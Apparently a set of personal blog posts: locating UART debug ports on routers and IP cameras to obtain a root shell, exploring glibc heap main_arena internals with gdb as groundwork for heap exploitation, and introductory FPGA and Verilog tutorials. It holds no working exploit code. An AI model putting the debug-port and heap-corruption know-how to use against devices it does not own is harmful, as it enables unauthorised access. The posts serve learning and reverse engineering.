The state machine for TX looks exactly the same! It just says "TX" instead of "RX" hehe. But anyway if you know how to implement state machines in verilog this helps a ton (there's an example shown later on). This is because when re-creating a lot of this knowledge during reverse engineering, you'd run across many different types of FSMs describing complex protocols, check out this example from Lattice ( https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466 ):

Surprisingly simple no? This is a good place to start with wire/hardware protocols I think, as far as I've looked the other one's can be looked at as different modes and orientations of some of the tricks uart uses.

For instance you can add some states to the FSM; accept 8 bits for a state before going into TX and you have a whole bunch of different instructions or addresses to store stuff or do stuff, from this simple FSM you can build a JTAG, SPI etc etc by simply adding states and adding states is not a massive mental operation once you got the previous idea. These simple extension gives you a tone of computational Joo Joo!

An awesome example can be found here https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html - comes in vhdl and verilog!

Its just a simple case statement with extra steps, not that big a deal! The tricky part is finding the friggin ports on the board.

This UART port dropped a root shell :) No uboot foolery needed. As you can see 3 lines are coming off the board, though there are 4 ports on the PCB? This is because one of the pins on the board was for the UART Vcc, which I don't need to use for anything because the module is already powered by the boards power supply.

UART Pins/Signals

UART pinouts can be as bare necessity as they come, ground (obviously); one signal for receiving, one for transmitting and maybe one for the "power in" Vcc.

RX - Receive State, each clock cycle a bit is gobbled up by the device (your "host" TX should be input to this port)
TX - Transmit State, ecah clock cycle a bit is pushed out by the device through this port (your
host" RX should be connected to this port)
Vcc - Power input, a power input, usually if your UART module is mounted to a board you probably don't want to feed this any input, you may overpower the device sometimes!
GND - Ground, very important port, if you don't know where this one is don't connect anything to the port.

Other UART standards may have many other signals if they're fancy and want to signal when data starts being transferred (to blink LEDs or signal other modules to do stuff) so sometimes you might see uart standards with specifications for "RX Data Ready" or "TX Transfer Done" and other transferring metadata.

The most important signals of course are RX, TX and GND you can usually get by with these. So lets look at what some UART interfaces look like on real devices. Here's some examples of UART ports, so you have a few examples to work from:

Straight forward UART give away, we can clearly see the GND, TX, RX port labelled on the silk screen. one can see the Vcc as the port here that is not labelled, this is probably precisely because the testing equipment doesn't use this port during certain checks.

Example of a UART port on a IP camera PCB

Probing out the Ground pin on a PCB for an IP camera.

Finding UART Ports

Hunting down UART ports is pretty easy usually. People tend to want them to be easily identifiable because either a machine on an assembly is supposed to find it; or a human - but either way their not going to have anyone play where's wally to find the debug port. UARTs are typically a straight line of 3 to 4 or more signals. Other typical behavior I've seen, that they can be either a very easy to see / reach place like on the edge of the board, near a SoC or other external connectors.

The process for identifying these ports is typically the following phases.

Methods for locating the ports/pins

Fastest method is to use the data sheet (my RTFM moment is finally here) for your device or as a first step assume there's a data sheet for literally everything (avoid reverse engineering stuff you don't need to) - and once you are all Google'd out and there's no data sheet anywhere in the whole world wide weeb network, then start playing with the electronics lol.

Find the ground signal. If you don't have a ground signal identified (by strong I mean, is strongly probably the right definite ground plane lol ), interacting with the UART safely is usually very hard to do. I like identifying the ground first because it means I can hook up all my toys without having them explode!

Continuity test between an obvious ground and suspected one (many PCBs have exposed metal around USB ports, power inlets etc etc that will usually be grounded). To double check that you have the right ground I suggest finding the ground of the power or other ports as well and checking that there is continuity between an obvious ground, and your UART ground.

If you have other ports near this one, check the voltage difference across some of them. Obviously making sure the numbers make sense (should be around 3-5 Volts, anything massively higher is highly strange).

If you have identified another SoC or chip on the board and you have the data sheet for it. See if you can find out whether:

It has a TX or RX (or MOSI / MISO any serial ports would be huge clues!) on it, see if this might give you more context on the possible UART port you're looking for. Obviously sometimes the system on chip needs to dump its debug data so it should be talking to the UART some how right? Could mean there's continuity between some pins!

Easy to see which one is ground. This is from a stock standard router I plucked off amazon. The two signals other than ground are as you guessed it RX and TX.

Interacting with the ports (logic tracing)

Hook up a logic analyzer to it (you don't always need a Saleae or how ever you spell it, some cheapo $20 one's sometimes to the job just fine!). Make sure your logic analyzer is grounded of course! And that the ground is common to the supposed UART!

Logic analyzing the UART on an IP Camera board. The logic analyzer I'm using a cheapo logic analyzer here, it bearly samples above 25MHZ hehe but it does the job sometimes!

Power the device, try to capture what you think will be where most of the OS debug noise will happen - sometimes it never stops and just keeps going, but you can't capture for ever and you don't need a huge capture to confirm a UART either - so think a bit about the device life cycle!

Look for some signals that register the following characteristics:

CLK - usually this is a very regular square have signal (check out some of the examples)
GND - just kidding you shouldn't be seeing this in your logic analyzer! Stay woke people!
RX - if you're taking about the RX from the boards perspective, this shouldn't be showing anything it should just be pulled high or stay constant at some level the whole time
TX - this is where the action is, if you're looking at a common TX signal for a UART it should start showing some "OS boot-loadery" looking data, or just readable data of some kind. For a lot of embedded devices this results in a direct bootl0oader shell, so expect kernel, expect Linux, expect us we are anonym-lol jk.

Some UART traffic. You'll notice that at some point the UART byte singled down always has a clock cycle with a first flop that doesn't contribute to the SET of bits that form part of the byte; this is because that little flop at the beginning is a start bit, its a signal that communicate the start of the RX cycle.

Interacting with the ports (dumping a UART shell)

Get some serial bytes onto your machine. There are various ways to do this, I'll briefly cover some methods that haven't failed me so far (in my limited experience):

Bus Pirate - I know its a essentially the script kiddie version of nmap for hardware hackers; but to be honest it gets the job done and its damn easy to use!

FTDI Serial TTL-232 cable, hook your port up-to this and stick it straight into your machine; the FTDI chip on these gadgets takes care of all the gritty details involved in turning the RX / TX into something picocom can pick up on your device.

https://www.adafruit.com/product/70

FPGA - for the hardcore folks out there, you can probably hook the UART upto a FPGA and use to forward it over to your machine using the FPGAs UART.

Open a serial port and suck out some bytes. Many tools exist to solve this probably but it usually comes to either picocom (I use picocom alot!) to or minicom or screen, anyway here are some simple tutorials for getting them going.

Anyway that's it for this post, I'll cover more hands on UART stuff soon! Stay tuned!

References and Reading:

Glibc Heap Exploitation Basics : ptmalloc2 internals (Part 3) : The Main Arena

2019-03-14T18:17:00.002-07:00

Hi folks, this post is part of a series in which I try to explore the internals of glibc's implementation ptmalloc2 which is used for managing heap memory. In this post I'm going to specifically pay attention to the main_arena and the malloc_state structure, which is used to store some important pointers for searching heap memory.

The main arena

The heap bakes the main_arena struct right into process memory. Its a struct of the type malloc_state and holds the following fields (extract from glibc-2.23/malloc/malloc.c):

1686 struct malloc_state
1687 {
1688 /* Serialize access. */
1689 mutex_t mutex;
1690
1691 /* Flags (formerly in max_fast). */
1692 int flags;
1693
1694 /* Fastbins */
1695 mfastbinptr fastbinsY[NFASTBINS];
1696
1697 /* Base of the topmost chunk -- not otherwise kept in a bin */
1698 mchunkptr top;
1699
1700 /* The remainder from the most recent split of a small request */
1701 mchunkptr last_remainder;
1702
1703 /* Normal bins packed as described above */
1704 mchunkptr bins[NBINS * 2 - 2];
1705
1706 /* Bitmap of bins */
1707 unsigned int binmap[BINMAPSIZE];
1708
1709 /* Linked list */
1710 struct malloc_state *next;
1711
1712 /* Linked list for free arenas. Access to this field is serialized
1713 by free_list_lock in arena.c. */
1714 struct malloc_state *next_free;
1715
1716 /* Number of threads attached to this arena. 0 if the arena is on
1717 the free list. Access to this field is serialized by
1718 free_list_lock in arena.c. */
1719 INTERNAL_SIZE_T attached_threads;
1720
1721 /* Memory allocated from the system in this arena. */
1722 INTERNAL_SIZE_T system_mem;
1723 INTERNAL_SIZE_T max_system_mem;
1724 };

Here's what some of the interesting fields mean (in addition to the already very helpful docs):

mutex_t mutex - this field is an integer that can be used to prevent other threads from messing with the arena while its being modified. We can see a confirmation of this in the code:

29 /* The mutex functions used to do absolutely nothing, i.e. lock,

30 trylock and unlock would always just return 0. However, even

31 without any concurrently active threads, a mutex can be used

32 legitimately as an `in use' flag. To make the code that is

33 protected by a mutex async-signal safe, these macros would have to

34 be based on atomic test-and-set operations, for example. */

35 typedef int mutex_t;

37 # define mutex_init(m) (*(m) = 0)

38 # define mutex_lock(m) ({ *(m) = 1; 0; })

39 # define mutex_trylock(m) (*(m) ? 1 : ((*(m) = 1), 0))

40 # define mutex_unlock(m) (*(m) = 0)

42 #endif /* !defined mutex_init */

int flags - this is an integer field that main arena uses to mark itself with properties. For instance should there be multiple main arena's (peep at the linked list node below and clues about attached_threads). In order to make using this field easy there are an accompanying list of functions for using these fields in the code:

1640 #define have_fastchunks(M) (((M)->flags & FASTCHUNKS_BIT) == 0)

1641 #define clear_fastchunks(M) catomic_or (&(M)->flags, FASTCHUNKS_BIT)

1642 #define set_fastchunks(M) catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)

1643

...

1652

1653 #define NONCONTIGUOUS_BIT (2U)

1654

1655 #define contiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) == 0)

1656 #define noncontiguous(M) (((M)->flags & NONCONTIGUOUS_BIT) != 0)

1657 #define set_noncontiguous(M) ((M)->flags |= NONCONTIGUOUS_BIT)

1658 #define set_contiguous(M) ((M)->flags &= ~NONCONTIGUOUS_BIT)

These are pretty self documenting.

fastbinsY - a pointer to the start of the fastbin array obviously this helps provide a common point in running down the fastbin structure. As I may have mentioned before fastbins are arranged by size, so what we have here is essentially a kind of minimalist priority heap.
mchunkptr top - pointer to the top chunk on the heap.
skipping last_remainder for now
mchunkptr bins - A pointer to the start of the unsorted bins. All chunks that are above fastbin max size will have pointers here, and the first two indexes are unsorted bins according to documentation.

unsigned int binmap - list of indexes for all of the bins indicating if they are free. We can see how its used in the _do_check_malloc_state function which is thrown in to the source for the sake of aiding debugging:

1576 #define mark_bin(m, i) ((m)->binmap[idx2block (i)] |= idx2bit (i))

1577 #define unmark_bin(m, i) ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))

1578 #define get_binmap(m, i) ((m)->binmap[idx2block (i)] & idx2bit (i))

...

2111 static void

2112 do_check_malloc_state (mstate av)

2113 {

2114 int i;

2115 mchunkptr p;

2116 mchunkptr q;

...

2188 /* binmap is accurate (except for bin 1 == unsorted_chunks) */

2189 if (i >= 2)

2190 {

2191 unsigned int binbit = get_binmap (av, i);

2192 int empty = last (b) == b;

2193 if (!binbit)

2194 assert (empty);

2195 else if (!empty)

2196 assert (binbit);

So it uses this to extract a "binbit" and this asserts whether the bin is in use or not. Anyway that's enough about the fields lets see them in action.

Exploring the main_arena with gdb

To explore the main_arena I whipped up a simple C program that allocates some chunks in series according to a size I specify on the command line.

> cat arena.c

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

char *make_string(size_t length){
char *arr = (char *) malloc(length);
asm("int $3");
return arr;
}
void free_string(char *arr){
free(arr);
asm("int $3");
return;
}
/*
Generate chunks in a list with a single size
- shows us how fast chunks work
*/
void make_chunk_field(size_t chunk_length,size_t amount_of_chunks){
int index = 0;
char **chunks = malloc(amount_of_chunks*sizeof(char *));
//printf("[*] chunk array head at [%p]\n",&chunks);

for (index = 0;index < amount_of_chunks; index++){
chunks[index] = make_string(chunk_length);
memset(chunks[index],0x40+index,chunk_length);
}
for (index = 0; index < amount_of_chunks;index++){
memset(chunks[index],0xFF,chunk_length);
free_string(chunks[index]);
}
}

int main(int argc, char **argv){
int run = 0;
if (argc < 4){
printf("Usage : %s [chunk length (bytes)] [number of chunks] [rounds]",argv[0]);
return 2;
}
size_t chunk_length = atoi(argv[1]);
unsigned int number_of_chunks = atoi(argv[2]);
int cycles = atoi(argv[3]);
int index = 0;
for (index =0;index<cycles;index++){
make_chunk_field(chunk_length,number_of_chunks);
}
}

I then ran this in gbd and set up an gdbinit to dump the main_arena. Simple gdbinit file:

> cat ~/.gdbinit
define hook-stop
x/16xg 0x603000
x/18xg &main_arena
info threads
end

I also dump what is usually the start of the heap at 0x603000 when I'm launching in gdb and some thread information. First thing I wanted to know was where each fastbin size goes according to practical demonstration the basic procedure was:

Assign a bunch of chunks of a given size
free up all of them
at each free, check the main_arena fastbinsY array contents

We of course need to know where fastbinsY starts, which gdb and glibc this is pretty easy, all you need to do is run it, set some break point and issue this command:

(gdb) x/1xg &main_arena->fastbinsY

0x7ffff7dd1b28 <main_arena+8>: 0x0000000000000000

Pretty much the same as far as the other fields go if you're curious enough. Okay so we know where the fastbinsY starts. Lets see what happens when we increase chunk size by 10 bytes everytime, basically I just ran arena.c like this:

The r 10 5 1 here means, run this with chunks of size 10 bytes, allocate an array of 5 chunks, and allocate and then deallocate them for 1 round. And after collecting enough data for size of chunks 10,20,30... until the fastbinsY is no longer used I saw this:

So clearly as soon as a chunk is bigger than 120 bytes on my machine it will start becoming an unsorted bin. We can see this when we do a request for 130 byte chunks:

So what happens if you try to change main arena fields while the heap is use or while the program is running? Lets see:

Glibc will panic when you mess with the main_arena, but the error is interesting here its not about the main_arena its about the fastchunk. Which means some legitimate fastchunk stuff probably happened with the corrupted data? We can see what is happening here with another experiment, by looking at which field in the fastchunk actually ends up in the main_arena by doing the following:

The screenshot above was produced by running the alloc/delloc for 2 rounds what I did was:

assigned some chunks to prep the heap (all the same size, running the same arena.c quoted above)
then re-assigned them
and while in flight I tinkered with the main_arena pointers.

After injecting a sample pointer we can see that the 0x434343 value gets pop'd into the main arena at the end of the error dump:

Pretty interesting! This field that gets pop'd out is none other than the mchunk->fd pointer which would obviously point to the next free fast bin. So we now know that when a chunk is assigned the fd pointer is replaced with the previous one. Right now I can't really see a useful way to abuse this, it just opens up some behavior that may be useful later.

That's going to be it for this one, next post is going to cover some stuff about the heap life cycle, which method actually get called when the heap sets up and tears down behind the scenes.

References and Reading

https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_state.html
http://core-analyzer.sourceforge.net/index_files/Page335.html
https://articles.forensicfocus.com/2017/10/16/linux-memory-forensics-dissecting-the-user-space-process-heap/
Heap Consistency Chceking (GNU.org) https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html#Heap-Consistency-Checking
https://stackoverflow.com/questions/1665419/do-threads-have-a-distinct-heap

[FPGAs] Introduction to the ICEStick40

2019-03-06T18:19:00.002-08:00

FPGAs are arguably the best way to get into hardware reverse engineering for many reasons. The most obvious one according to me is the experience in what I've to term "raw clockiness" (or the practice of making a real hardware backed clock; do exactly what you want). There is a certain romanticism of freshly broken set theory and deep repressed proof theory sins that comes to bare for me when I'm exposed to this kind of computing. All other kinds tend to veil this shaky, sometimes deeply COUNTER intuitive means of problem solving :)

Basically what I mean to say here is that if you can get over the hurdle with FPGAs (which is not a big deal at all if you know basic set theory) you've mastered many things that repeatedly form the base of the problems you'll need to solve in reverse engineering hardware questions like:

What is this thing doing with that oscillator? What on earth can it possibly be doing? There are only so many combinatoric things that can happen based on the context and components / traces handling a signal or input - the more experience you have with raw signal programming the better you get to know these limitations and nuances. They are the most important rules of the game a lot of the time.
Which one of these input/output signals is the clock / data etc etc based on what components are doing with it in context? Like an argument to a function in assembly you are trying to type based on its place in other functions and contexts.
How does this thing receive its programming or settings? from where? how often? FPGAs are often volitile, they don't "store" their programming for ever it is constantly reprogrammed for use, programming is usually done via a micro-controller or anything that can squawk some bit stream into the chip really.
OMG is that an FPGA on the board? Sometimes things you are trying to identify can literally just straight up be FPGAs hehe

Anyway enough philosophical waxing (jokes everything is a kind of soft philosophy to me now); lets get into a quick example with the ICEStick. The reason I really really like this project is because its completely open source, you can get the ICEStick for super cheap on amazon and various other places; so its super easy to get started! All you need to do is download a couple things, write a make file and start pumping out bit streams that do the awesome things. In this post I'll cover all you need to do, to get that going.

Basic Workflow

Here are the basic steps:

Write some verilog modules (*.v files) - obvious any text editor will do but vi(m) is always the best choice always.
Define a constraints file for your board (*.pcf files) - this tells the other tools where to find what component when place n routing when producing the bitstream. You only need to do this once depending on which components you're using on which board.
Synthesize them into a bitstream (*.bin files) - for this we will use yosys
Produce some place n' route files (*.txt files) - our place n route tool here will be arachne-pnr (pnr stands for "place n route"
Program/flash the FPGA board with iceprog

Preparing the Environment

You need to grab a couple tools to get this all setup (most of the posts I link below mention other steps for various platforms) for this one I'm sticking to simple Ubuntu 18 LTS machine with nothing fancy installed except git. All you need to do is download a couple repositories and make + install them.

install / make dependencies
install / make yosys, arachne-pnr, iceprog
Test build

I've whipped up a simple script that does all this for you, available on gist:

All you need to do is run this and it should sort everything. Could take a couple minutes.
Once that's all done, make yourself a test folder and stick this convenient Makefile in their:

To use the make file you simply do the following:

Replace the VER variable with the name of the Verilog module you'd like to synthesize.
make (make everything).
make prog (program the most recent bitstream).

Last thing you need to do, before writing some Verilog; is define a constraints file (*.pcf). You might notice that the tools we use here are not specifically for a particular board, they support a range of them. In order to make sure (when you synthesize a bitstream) that you're targeting the right board - you need to state some configurations for IOPins, clocks and other goodies you'd like the FPGA to interact with on the board, here's what the ICEStick40's .pcf file looks like:

LED Blinker with ICEStick40

Once you've got everything up and running, you'll be able to whip up a simple LED Blinker like so:

Good thing here is that this works pretty much like any other LED blink counter, it just maps some reg's to the LEDs, and flips them on and off using a clock pre-scaler that reduces it to 1Hz (using a 21 bit reg array). If you're confused about these words its totally cool, I have some blog posts on the way that explain how they work in full. For now just make sure you can get your environment working, making sure you understand the code is a workable problem, but only if you can actually hit the FPGA with the right stuff.

If you compile this using my Makefile (or not), you should see something like the following output (luckily because yosys and the pnr tools are pretty verbose, you will be able to trace quite a bit of activity if things are going funky):

Last step is actually programming the FPGA with the bitstream we just generated, here's what the output is meant to look like:

>sudo make prog
iceprog example.bin
init..
cdone: high
reset..
cdone: low
flash ID: 0x20 0xBA 0x16 0x10 0x00 0x00 0x23 0x64 0x34 0x65 0x04 0x00 0x22 0x00 0x32 0x27 0x12 0x16 0xFE 0x6A
file size: 32220
erase 64kB sector at 0x000000..
programming..
reading..
VERIFY OK
cdone: high
Bye.

That's it for this one folks.

References and Reading

https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux
Various ICEStick posts from hackaday https://hackaday.com/tag/icestick/
http://www.clifford.at/icestorm/

[FPGAs] (Introduction to FPGAs) :: an LED Blinker with Mojo v3

2019-01-28T16:50:00.001-08:00

Wiring my board up to an LCD screen on top of a copy of Hegel's Aesthetics.

Hi folks, in this post I'm going to give you as gentle and introduction to FPGA (I will unpack the acronym later) programming as possible, hopefully explaining as much as I know (which is a very little up to this point, but enough to I guess help some folks so), while providing lots of examples and challenges for folks who need ideas to try out that are easy enough to get a foothold.

If you're familiar with any programming you should have enough to get going in Verilog it just requires a bit of re-orientation and practice - just like any language basically ;)

To start lets think about what we are going to do here, FPGAs are pieces of hardware that we can configure. That configuration is done by taking the language we speak (which is English/Human-Language equivalent Verilog); and converting it, into that configuration for the FPGA, this is configuration is called a bit stream. A bit stream is what the final effort of "synthesizing" is essentially; its kind of like putting together a little song for the chip that the computer tweets over lovingly, lullying it into total subservience.

There are many different kind so FPGAs so you can play little songs to many different kinds of chips, the tunes are ever wilder, faster and more exciting the more powerful the chips get - I've only programmed like one so far. But have a shop around, there are tons of boards and kits out there that aren't that expensive, some of them are open source as well! I'm going to use the Mojo v3 in this post though (purely because its a well documented board, there's a book out on it as well); i thought it would be an easy way to start. I will definitely cover more open source FPGA tech as well in future :P.

Mojo V3 in a super hipster instagram filter

What are FPGAs

FPGAs (Field Programmable Gate Arrays - see told'cha) are essentially a very very small grid of (usually thousands) of configurable circuits. FPGAs provide a way to describe combinations of these small configurable circuits that are provably analogous (intended to work exactly the same as) some hardware description language.

To configure the circuitry I mentioned, you essentially tell the FPGA what to tell its different components. This list might be a ton of information but its not super crucial you understand it, you can program a board fine without knowing any of this, its just good to know about it so you can be a little more aware of what you're doing.

These different components of an FPGA are of the following (some manufacturers may differ in many ways):

Programmable Interconnects (Points) (PIPs) : These are (according to my sources [2]) basically blocks of circuitry that allow you to route signals between CLBs.

Controllable Logic Blocks (CLBs) : This component of the FPGA is where most of the magic happens, the more CLBs an FPGA has the more data it can store and process essentially. The CLBs have a couple of components to them:

Flip Flops : these are for responding to clocked events, storing data (I will explain how this happens later). You will essentially orientate your programming to leverage these Flip Flops to modify information in response to clock events (when the clock signal goes from high to low or vice versa). This I think why they are called" flip flops" because they allow you to flip flop along with the clock lol.
Internal RAM: for configuring Look up tables (LUTs), these are basically just switch statements of a certain kind, they hold configurations for the logic components[2] inside the CLB.
Multiplexers : These essentially take in multiple input signals and combined them into fewer output signals or as one post puts it:

The multiplexer, shortened to “MUX” or “MPX”, is a combinational logic circuit designed to switch one of several input lines through to a single common output line by the application of a control signal. [6]

Configurable I/O Blocks (IO Blocks) : These are basically input/output points (or if you like ports), that allow you to tap signals into the FPGA, or push out signals from the FPGA. A simple example would be turning on an LED, you will need some place to stick the LED 'into' to make it turn on, the I/O block is where this signal for the LED will get fed from. Please don't stick LEDs directly into your I/O ports on your boards I'm just making an analogy - I will most likely cover a simple external LED tutorial as well, because its pretty vital in the journey to more complex external stuff ;). The I/O blocks have components to them as well, these essentially allow you to respond to the signal when it makes a certain transition or takes a certain state.

The high or low state of the signal is called the logic level. If we tell a circuit to respond to an event when an input signal is high, the input is referred to as active high. When we tell it to respond to an input signal is low, guess what its called active low!

Check out [2] in the Reading and References section for cool pictures about it.

Anyway its basically like play dough for hackers and electrical engineers. They aren't hard to get your head around but the can be very very useful when you do! I think getting over the FPGA hill is a very important step in your career as a hacker (just my opinion lets say).

What you will need

DISCLAIMER: The current tutorial involves giving your address to the Xilinx folks (I think this is because of US Export laws) which is pretty crappy not for any other reason than its private information and it can be mistreated, lost or stolen. So if you're not up for that, please just follow along for interests sake I promise I will provide fully open source no address information bribery required - tutorials as well.

But, if you're okay with the Xilinx folks knowing where you live and that you're learning the dangerous sorcery of FPGA hardware - please go download the Xilinx ISE below.

Mojo V3 Board available at amazon[10], SparkFun[9], Alchitry [8] and I'm sure a ton of other places.
Xilinx ISE available at https://www.xilinx.com/ (Sign up for an account and download the ISE)
USB 3.0 to Micro-B cable
Mojo Loader (for loading your program onto the board)
Mojo IDE (provides a different interface for verilog programing, simpler but less specific than the ISE verilog IDE) Mojo IDE also comes with its own programming variant called Lucid: https://alchitry.com/pages/lucid

You will need to install the ISE on which ever platform you like (I suggest using Linux based one's its just way easier and doesn't require a ton of driver drama). For more information how to get that going please see the following example: https://alchitry.com/pages/installing-ise .

Verilog Crash Course

I'm going to be doing this tutorial in Verilog; realizing this can be a bit of an obscure language (I agree it is obscure - but for no super hard to understand reason to be honest) you might need a bit of a jump start into to it if you've not ever done it before, but don't fret the whole point of this blog post is to try to explain this to someone who's never done it before.

Lets get to it, Verilog is a hardware description language, we call Verilog hardware language register-transfer-level (or its an RTL language); this wording is meant to describe what Verilog targets with its abstraction, essentially the transfer of signals between hardware level registers (and other components) [11,12,13,14]. Anyway once you have everything installed according to the tutorials above; you can then start scripting some Verilog for the Mojo.

Here's what a bare bones Verilog script looks like:

module hello_verilog(input clk, output external_led)

always @ (posedge clk) begin

external_led <= clk ^ external_led;

end

endmodule

This is just an example Verilog script to show how elements of the language work, it probably won't achieve anything profound if it were implemented as a real Verilog module on an actual FPGA though (this is because of the frequency of the clock - more on this later). And the reason is something that I need to cover before I can show you a real Verilog script.

Anyway, before we unpack that; lets take a look at this script and explain each part.

module hello_verilog(input clk, output external_led);

...

endmodule

This is the module header; it declares the inputs and outputs of the module begin defined here. Also it obviously needs to have a declared endmodule as well.

These inputs and outputs (and I'm no deep expert here) can essentially be driven by the I/O blocks - depending on what you feed the module as inputs. So if you want to drive in some external module with pins the FPGA board needs to talk to (like a logic analyzer or oscilloscope) - these input / output declarations are what you designate them as.

The next section of code I want to get around is this:

always @ (posedge clk) begin
...
end

This is an always section of Verilog code, it defines actions that happen "in tune" or according to certain changes with the specified sensitivity list in the brackets. This means that when the clock "clk" (which is for all intents and purposes a square wave - see the example further down), is registering a change from a 0 to 1 value this is called a positive edge, or posegde in Verilog (the other one is called a negedge or negative edge).

So it essentially says in summary, when the clock changes from 0 to 1 always do this stuff. And it closes with an end token of course.

Next we have the assignment operation in side the always block:

external_led <= clk ^ external_led;

This is called a non-blocking assignment[14]. This kind of assignment means if there are any assignments after it or before it (of this same kind "<="), they will all be assigned in parallel (see [14] for an excellent explanation of the different pit falls and always block politics as well). Its kind of like attaching connectors to things from a source, if they are in parallel the electricity can be expected to be seen running down each connector at the same time. The assignment gives external_led the value of clk xor'd with the current value of external led. If you think it through, you'll see that this is a way to make it flip on and off not so? A good exercise is to try and write out the values.

Okay so I mentioned this is a non-blocking assignment, does that mean there is another kind? YES! Guess what its called a blocking assignment! Here's what it looks like:

// syntax [left operand] "=" [right operand]
external_led = clk ^ external_led;

A dead plain "=" symbol is used. The way to remember this lies in understanding the header of an always where this assignment is allowed, here's a blocking always block:

always @ (*) begin
external_led = clk ^ external_led
end

These always blocks, are for designing combinatorial logic circuits or logic gates (literally AND, OR, XOR etc gates ) they are great if you need to get really really low level, as in as base implementation of any digital logic as you'd like on the FPGA.

To summarize:

blocking = assignments are for combinatorial logic : Logic gates, where all statements take on their respective actions in parallel to each other.
non-blocking <= for sequential logic : statements potentially depend on a certain sequence to derive their values.

Anyway what I'm trying to say is blocking always blocks are for combinatorial logic, non-blocking always blocks are for sequential logic or building registers - these are things that store information for us, we can chain them up in "sequences" and do useful things like building finite state machines! The reason I'm going with a non-block always block in the example, and will most probably go with it in the real example too - is because the on board led's on the Mojo are declared as reg's in Verilog- and we will modulate our clock speed using regs too! You will run into a fair amount of frustration with this concept anyway - so just get used to wading out your problems with it, I don't think its a completely avoidable mistake hehe.

You probably want to pick up a book on assignment operations, and constraints and practice them a bit (I've tried to be as verbose as possible). This is because one can immediately tell that this imposes major drama on which types are assignable to which types i.e. can you assign reg to wire? Its basically due to how it resolves different types to the board components and combinations of them mentioned above - if you give it something that works sequentially or is meant for non-storage options it can cause antagonisms that are annoying. So be careful and try out stuff a lot, write some bad Verilog so you know what it looks like lol.

Okay so that's pretty bare bones Verilog, you will probably be able to develop "valid" Verilog using this but to be able to compute on real things, real clocks and achieve actual interaction with real "hardware" you're going to need to learn how to divide the clock!

Clock Divider Circuits and Blinking LEDs

I like starting with this because it will be an integral part of a lot of Verilog problems and problem solving strategies. We will most probably be sampling from a certain module at a given rate, clocking in data at given rates; you might need to run multiple different things at multiple different clock frequencies or be required to by certain protocols. So you shouldn't think of a clock as a single rhythm to dance your circuit to, instead see it as something consisting of beats you can skip, group together or chop up anyway you need (within in physical bounds of course) - multiple loving tweets at different frequencies :)

Here's a simple clock divider circuit in Verilog, this essentially drives the Mojo v3 boards on board led[0] to follow a clock that flips on and off at half the frequency of the boards natural clock:

module mojo_top( /*module declaration*/
input clk, //clock input @ 50 MHz (according to ucf file)
input rst_n, //reset input
output [7:0]led //array of LEDs on the Mojo Board
);

wire rst = ~rst_n; // make reset active high
reg [25:0] clk_div; //declare 25 bits worth of D-FlipFlop "storage"
assign led[6:0] = 6'bz; //set the LEDs from 6 down to 7 to "off"
assign led[7] = clk_div[20]; //assign 20th bit in clk_div to led 0

always @ (posedge clk) begin //declare always block
clk_div <= clk_div + 1; //add one to the 25 bit array

end
endmodule

And the user constraints file looks like this:

NET "clk" TNM_NET = clk;
TIMESPEC TS_clk = PERIOD "clk" 50 MHz HIGH 50%;

# PlanAhead Generated physical constraints
NET "clk" LOC = P56 | IOSTANDARD = LVTTL; //clock signal
NET "rst_n" LOC = P38 | IOSTANDARD = LVTTL; //reset button
NET "led<0>" LOC = P134 | IOSTANDARD = LVTTL; //on board led 1
NET "led<1>" LOC = P133 | IOSTANDARD = LVTTL; //on board led 2
NET "led<2>" LOC = P132 | IOSTANDARD = LVTTL; //and so forth...
NET "led<3>" LOC = P131 | IOSTANDARD = LVTTL;
NET "led<4>" LOC = P127 | IOSTANDARD = LVTTL;
NET "led<5>" LOC = P126 | IOSTANDARD = LVTTL;
NET "led<6>" LOC = P124 | IOSTANDARD = LVTTL;
NET "led<7>" LOC = P123 | IOSTANDARD = LVTTL;

Lets run through the code a bit. I need to cover this declaration:

reg [25:0] clk_div;

This declares what is called a register. Now it doesn't mean that it simply stores values, it kind of just keeps a value until you give it another one. And whats also important to remember is that sometimes you can string up reg's that won't actually make it into the bit stream. Check out this awesome stack overflow answer:

> Contrary to their name, regs don't necessarily correspond to
> physical registers. They represent data storage elements in
> Verilog/SystemVerilog. They retain their value till next value is
> assigned to them (not through assign statement). They can be
> synthesized to FF, latch or combinatorial circuit. (They might not be
> synthesizable !!!)

- (extract from: https://stackoverflow.com/questions/33459048/what-is-the-difference-between-reg-and-wire-in-a-verilog-module )

Besides the other declarations and (already covered) always blocks, we see a input/output declaration mentioning :

input clk - the input clock signal (pay attention to the User Constraints File to see how this is declared). In our example it simply a slowed down version of the clock on the board.
input rst_n - we don't actually use this just yet, its the input from the reset button on the Mojov3 Board; this is a great little "toggle" to have around.
output [7:0] led - this is an array of reg's declared as output. I know they are reg's (registers) because of how they are elaborated in the User Constraints file namely: NET "rst_n" LOC = P38 | IOSTANDARD meaning essentially location P38 on the board should be a NET called rst_n;

The NET type is essentially the type that allows driving form and to I/O blocks, check out this other awesome stackoverflow answer:

"The net data types can represent physical connections between structural entities, such as gates. A net shall not store a value (except for the trireg net). Instead, its value shall be determined by the values of its drivers, such as a continuous assignment or a gate."

- https://stackoverflow.com/questions/9975415/what-does-net-stand-for-in-verilog

The other interesting piece of code here are the reg declarations I added (not outputs or inputs, just internal registers we need to store some of the clock flips):

assign led[6:0] = 6'bz;

This assigns 0 to the 6 bit positions from 7th (number 6) down to 0th which leaves 1 open, namely the 8th bit is set as:

assign led[7] = clk_div[20];

This assignment sets the 7th bit to the clk_div array of registers 20th bit value. So i declared 25 bits and I'm taking the 20th one and making it always the same as led[7]. The final piece of the puzzle is in the always block:

clk_div <= clk_div + 1;

This adds 1 bit to the 25 bit value of clk_div. As far as I understand this, it means that clk_div will add up and when whatever number its at has a "1" in the 20th bit position, the LED[1] will turn on.

